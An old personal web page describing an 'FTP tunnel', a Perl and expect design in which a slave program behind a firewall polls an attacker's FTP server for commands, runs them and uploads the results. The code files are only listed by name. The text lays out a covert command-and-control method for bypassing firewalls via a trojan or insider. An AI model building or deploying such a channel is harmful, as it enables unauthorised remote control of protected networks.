Author : Dhiraj Bhuyan

        I read about http-tunnel and email-tunnel some hours back. But I did not see anything about ftp - which can also be used for similar tunnelling purpose. Many system administrators do allow outbound ftp connections - in which cases ftp can be used for similar "attact from inside". I have written some codes to demonstrate this (although I don't think it requires demonstration!). It's written in perl and tcl/expect - very naive - allows execution of remote commands behind the firewall and then see the results.

        [ Those who haven't read about http and email tunnels - lemme explain this first - firewalls are ment to protect your network from an outside attack. This is done by refusing connections to requests coming from outside the lan etc etc. But with active cooperation from inside (a trojan that you managed to push in undetected or maybe with the help of a disgrunted employee), one can still bypas the firewall and do things you were not supposed to do from outside. However you still need to send commands to your slave sitting inside through the firewall. So people have worked out various ways of doing that. FTP-tunnel is one such attempt. ]

         The idea behind ftp-tunnel is that we can have a slave running behind the firewall which periodically ftp's to a remote machine and looks for a predefined file (where the master has stuffed in the instructions to be executed). Once it locates that file, it gets it and executes the instructions mentioned in the file, dump the output to a file and then ftp back to that same machine to put this output file, so that the master can view the result. Thus the master, inspite of being blocked by the firewall, is actually bypassing it to do things it was not supposed to do!

        To explain how my codes work - slave.pl (this is the one which is helping you from inside) runs on a machine behind the firewall and periodically ftp's to a remote machine and looks for a file "semaphoreA" - to see if its master has any request - the absence of the file would indicate no request. More subtle implementation would do something like scan a web page for key words. On the remote machine, the attacker will launch the code master.pl when he wants to execute some commands remotely  - this code will ask for the command to be executed, puts it it a file "request"  and makes the semaphoreA file available - so that next time the slave can see it. It will also create a garbage file semaphoreB which is to be used by the slave and then periodically looks for the file semaphoreC - the moment it gets it, it knows that she has the output of the command available in the file "answer". On the slave side, the moment the slave sees the file semaphoreA on the remote machine, if ftp's the request file and then the semaphoreB file. The main program uses the semaphoreB file as an indication that a "request" has come. The command is then executed - the answer put in the file "answer" - it then ftp's the files "answer" and semaphoreC to the remote machine.

    So here are the codes -

    master.pl    (perl code)
    slave.pl        (perl code - make sure you have the login, passwd and machine name correct here!)
    ftp-get        (tcl/expect)
    ftp-send     (tcl/expect)
 
 

        Further Work

        There is a suggestion to rewrite the code to make it more of a transport tunnel - that allows tcp over ftp. But I do not see much use of ftp-tunnel as a transport tunnel due to latency problems - so I am leaving it as it is - curious readers can pursue further!

        Please note that I wrote this piece of code out of sheer academic curiocity. It is not intended to help people break  the law. I however take no responsibility for the misuse of this piece of code.
 

        Flames > /dev/null
        eGreetings > dbhuyans@yahoo.com
 

        Cheers!